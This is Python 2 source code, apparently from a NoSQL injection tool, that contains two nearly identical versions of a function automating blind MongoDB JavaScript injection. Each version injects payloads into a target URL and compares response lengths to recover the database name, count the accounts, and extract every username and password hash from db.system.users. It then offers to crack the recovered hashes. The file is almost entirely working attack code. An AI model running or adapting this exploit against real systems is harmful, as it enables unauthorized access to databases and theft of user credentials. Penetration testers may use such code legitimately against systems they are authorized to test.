def getDBInfo(): curLen = 0 nameLen = 0 gotFullDb = False gotNameLen = False gotDbName = False gotColLen = False gotColName = False gotUserCnt = False finUser = False dbName = "" charCounter = 0 nameCounter = 0 usrCount = 0 retrUsers = 0 users = [] hashes = [] crackHash = "" chars = string.ascii_letters + string.digits print "Getting baseline True query return size..." trueUri = uriArray[16].replace("---", "return true; var dummy ='!" + "&") #print "Debug " + str(trueUri) req = urllib2.Request(trueUri, None, requestHeaders) baseLen = int(len(getResponseBodyHandlingErrors(req))) print "Got baseline true query length of " + str(baseLen) print "Calculating DB name length..." while gotNameLen == False: calcUri = uriArray[16].replace( "---", "var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&") #print "Debug: " + calcUri req = urllib2.Request(calcUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) #print "Debug length: " + str(lenUri) if lenUri == baseLen: print "Got database name length of " + str(curLen) + " characters." gotNameLen = True else: curLen += 1 print "Database Name: ", while gotDbName == False: charUri = uriArray[16].replace( "---", "var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '" + chars[charCounter] + "') { return true; } var dum='a" + "&") req = urllib2.Request(charUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: dbName = dbName + chars[charCounter] print chars[charCounter], nameCounter += 1 charCounter = 0 if nameCounter == curLen: gotDbName = True else: charCounter += 1 print "\n" getUserInf = raw_input("Get database users and password hashes (y/n)? ") if getUserInf.lower() == "y": charCounter = 0 nameCounter = 0 # find the total number of users on the database while gotUserCnt == False: usrCntUri = uriArray[16].replace( "---", "var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a") req = urllib2.Request(usrCntUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: print "Found " + str(usrCount) + " user(s)." gotUserCnt = True else: usrCount += 1 usrChars = 0 # total number of characters in username charCounterUsr = 0 # position in the character array-Username rightCharsUsr = 0 # number of correct characters-Username rightCharsHash = 0 # number of correct characters-hash charCounterHash = 0 # position in the character array-hash username = "" pwdHash = "" charCountUsr = False query = "{}" while retrUsers < usrCount: if retrUsers == 0: while charCountUsr == False: # different query to get the first user vs. others usrUri = uriArray[16].replace( "---", "var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&") req = urllib2.Request(usrUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: # Got the right number of characters charCountUsr = True else: usrChars += 1 while rightCharsUsr < usrChars: usrUri = uriArray[16].replace( "---", "var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '" + chars[charCounterUsr] + "') { return true; } var dum='a" + "&") req = urllib2.Request(usrUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: username = username + chars[charCounterUsr] #print username rightCharsUsr += 1 charCounterUsr = 0 else: charCounterUsr += 1 retrUsers += 1 users.append(username) # reinitialize all variables and get ready to do it again #print str(retrUsers) #print str(users) charCountUsr = False rightCharsUsr = 0 usrChars = 0 username = "" while rightCharsHash < 32: #Hash length is static hashUri = uriArray[16].replace( "---", "var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '" + chars[charCounterHash] + "') { return true; } var dum='a" + "&") req = urllib2.Request(hashUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: pwdHash = pwdHash + chars[charCounterHash] #print pwdHash rightCharsHash += 1 charCounterHash = 0 else: charCounterHash += 1 hashes.append(pwdHash) print "Got user:hash " + users[0] + ":" + hashes[0] # reinitialize all variables and get ready to do it again charCounterHash = 0 rightCharsHash = 0 pwdHash = "" else: while charCountUsr == False: # different query to get the first user vs. others usrUri = uriArray[16].replace( "---", "var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&") req = urllib2.Request(usrUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: # Got the right number of characters charCountUsr = True else: usrChars += 1 while rightCharsUsr < usrChars: usrUri = uriArray[16].replace( "---", "var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '" + chars[charCounterUsr] + "') { return true; } var dum='a" + "&") req = urllib2.Request(usrUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: username = username + chars[charCounterUsr] #print username rightCharsUsr += 1 charCounterUsr = 0 else: charCounterUsr += 1 retrUsers += 1 # reinitialize all variables and get ready to do it again charCountUsr = False rightCharsUsr = 0 usrChars = 0 while rightCharsHash < 32: #Hash length is static hashUri = uriArray[16].replace( "---", "var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '" + chars[charCounterHash] + "') { return true; } vardum='a" + "&") req = urllib2.Request(hashUri, None, requestHeaders) lenUri = int(len(getResponseBodyHandlingErrors(req))) if lenUri == baseLen: pwdHash = pwdHash + chars[charCounterHash] rightCharsHash += 1 charCounterHash = 0 else: charCounterHash += 1 users.append(username) hashes.append(pwdHash) print "Got user:hash " + users[retrUsers - 1] + ":" + hashes[retrUsers - 1] # reinitialize all variables and get ready to do it again username = "" charCounterHash = 0 rightCharsHash = 0 pwdHash = "" crackHash = raw_input("Crack recovered hashes (y/n)?: ") while crackHash.lower() == "y": menuItem = 1 for user in users: print str(menuItem) + "-" + user menuItem += 1 userIndex = raw_input("Select user hash to crack: ") nsmmongo.passCrack(users[int(userIndex) - 1], hashes[int(userIndex) - 1]) crackHash = raw_input("Crack another hash (y/n)?") raw_input("Press enter to continue...") return
def getDBInfo(): curLen = 0 nameLen = 0 gotFullDb = False gotNameLen = False gotDbName = False gotColLen = False gotColName = False gotUserCnt = False finUser = False dbName = "" charCounter = 0 nameCounter = 0 usrCount = 0 retrUsers = 0 users = [] hashes = [] crackHash = "" chars = string.ascii_letters + string.digits print "Getting baseline True query return size..." trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&") #print "Debug " + str(trueUri) baseLen = int(len(urllib.urlopen(trueUri).read())) print "Got baseline true query length of " + str(baseLen) print "Calculating DB name length..." while gotNameLen == False: calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&") #print "Debug: " + calcUri lenUri = int(len(urllib.urlopen(calcUri).read())) #print "Debug length: " + str(lenUri) if lenUri == baseLen: print "Got database name length of " + str(curLen) + " characters." gotNameLen = True else: curLen += 1 print "Database Name: ", while gotDbName == False: charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&") lenUri = int(len(urllib.urlopen(charUri).read())) if lenUri == baseLen: dbName = dbName + chars[charCounter] print chars[charCounter], nameCounter += 1 charCounter = 0 if nameCounter == curLen: gotDbName = True else: charCounter += 1 print "\n" getUserInf = raw_input("Get database users and password hashes (y/n)? ") if getUserInf in yes_tag: charCounter = 0 nameCounter = 0 #find the total number of users on the database while gotUserCnt == False: usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a") lenUri = int(len(urllib.urlopen(usrCntUri).read())) if lenUri == baseLen: print "Found " + str(usrCount) + " user(s)." gotUserCnt = True else: usrCount += 1 usrChars = 0 #total number of characters in username charCounterUsr = 0 #position in the character array-Username rightCharsUsr = 0 #number of correct characters-Username rightCharsHash = 0 #number of correct characters-hash charCounterHash = 0 #position in the character array-hash username = "" pwdHash = "" charCountUsr = False query = "{}" while retrUsers < usrCount: if retrUsers == 0: while charCountUsr == False: #different query to get the first user vs. others usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&") lenUri = int(len(urllib.urlopen(usrUri).read())) if lenUri == baseLen: #Got the right number of characters charCountUsr = True else: usrChars += 1 while rightCharsUsr < usrChars: usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&") lenUri = int(len(urllib.urlopen(usrUri).read())) if lenUri == baseLen: username = username + chars[charCounterUsr] #print username rightCharsUsr += 1 charCounterUsr = 0 else: charCounterUsr += 1 retrUsers += 1 users.append(username) #reinitialize all variables and get ready to do it again #print str(retrUsers) #print str(users) charCountUsr = False rightCharsUsr = 0 usrChars = 0 username = "" while rightCharsHash < 32: #Hash length is static hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&") lenUri = int(len(urllib.urlopen(hashUri).read())) if lenUri == baseLen: pwdHash = pwdHash + chars[charCounterHash] #print pwdHash rightCharsHash += 1 charCounterHash = 0 else: charCounterHash += 1 hashes.append(pwdHash) print "Got user:hash " + users[0] + ":" + hashes[0] #reinitialize all variables and get ready to do it again charCounterHash = 0 rightCharsHash = 0 pwdHash = "" else: while charCountUsr == False: #different query to get the first user vs. others usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&") lenUri = int(len(urllib.urlopen(usrUri).read())) if lenUri == baseLen: #Got the right number of characters charCountUsr = True else: usrChars += 1 while rightCharsUsr < usrChars: usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&") lenUri = int(len(urllib.urlopen(usrUri).read())) if lenUri == baseLen: username = username + chars[charCounterUsr] #print username rightCharsUsr += 1 charCounterUsr = 0 else: charCounterUsr += 1 retrUsers += 1 #reinitialize all variables and get ready to do it again charCountUsr = False rightCharsUsr = 0 usrChars = 0 while rightCharsHash < 32: #Hash length is static hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&") lenUri = int(len(urllib.urlopen(hashUri).read())) if lenUri == baseLen: pwdHash = pwdHash + chars[charCounterHash] rightCharsHash += 1 charCounterHash = 0 else: charCounterHash += 1 users.append(username) hashes.append(pwdHash) print "Got user:hash " + users[retrUsers-1] + ":" + hashes[retrUsers-1] #reinitialize all variables and get ready to do it again username = "" charCounterHash = 0 rightCharsHash = 0 pwdHash = "" crackHash = raw_input("Crack recovered hashes (y/n)?: ") while crackHash in yes_tag: menuItem = 1 for user in users: print str(menuItem) + "-" + user menuItem +=1 userIndex = raw_input("Select user hash to crack: ") nsmmongo.passCrack(users[int(userIndex)-1],hashes[int(userIndex)-1]) crackHash = raw_input("Crack another hash (y/n)?") raw_input("Press enter to continue...") return